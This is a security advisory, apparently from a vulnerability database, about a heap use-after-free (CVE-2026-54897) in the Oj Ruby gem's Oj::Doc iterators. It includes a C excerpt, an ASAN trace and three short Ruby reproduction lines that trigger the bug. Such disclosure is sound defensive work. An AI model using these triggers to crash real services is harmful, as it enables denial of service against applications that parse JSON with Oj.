PT-2026-51083 · Rubygems · Oj

Publicado

2026-06-19

·

Atualizado

2026-06-19

·

CVE-2026-54897

CVSS v4.0

8.7

Alta

VetorAV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Summary

Oj::Doc iterators (each value, each child, each leaf) are vulnerable to a heap use-after-free. When a Ruby block yielded during iteration calls doc.close or d.close, the document's heap memory is freed while the C iterator is still running. When control returns from the block, the iterator reads from the freed region, producing a use-after-free accessible from pure Ruby.

Version

  • Software: oj gem
  • Affected: all versions with ext/oj/fast.c
  • Latest tested: 3.17.1 (confirmed present)

Details

The iterators in ext/oj/fast.c follow the pattern:
c
// fast.c:1505 (doc each child)
static VALUE doc each child(VALUE self, ...) {
  ...
  while (cur != NULL) {
    rb yield(...);    // ← Ruby block executes here
    cur = cur->next;   // ← cur is now freed if block called close()
  }
}
rb yield can invoke arbitrary Ruby code, including calling close() on the Doc or any child node, which calls ruby sized xfree on the backing buffer. On return, the C code reads cur->next from the freed region. All three iterators are affected.
ASAN report (each child variant):
==253632==ERROR: AddressSanitizer: heap-use-after-free on address 0x5210000bd080
READ of size 8 at 0x5210000bd080 thread T0
  #0 doc each child /ext/oj/fast.c:1505
0x5210000bd080 is located 896 bytes inside of 4064-byte region [0x5210000bcd00, 0x5210000bdce0)
freed by thread T0 here:
  #0 free
  #1 ruby sized xfree (libruby-3.3.so.3.3)
All three iterators trigger the same freed region (fd shadow bytes):
0x5210000bd080:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd

Reproduce

ruby
require 'oj'
# each child
Oj::Doc.open('[1,2]') { |doc| doc.each child { |d| d.close } }
# each value
Oj::Doc.open('[1,2]') { |doc| doc.each value { |v| doc.close } }
# each leaf
Oj::Doc.open('[1,[2]]') { |doc| doc.each leaf { |d| d.close } }

Correção

Use After Free

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-416

Identificadores relacionados

CVE-2026-54897
GHSA-9PPP-W3G4-FH4Q

Produtos afetados

Oj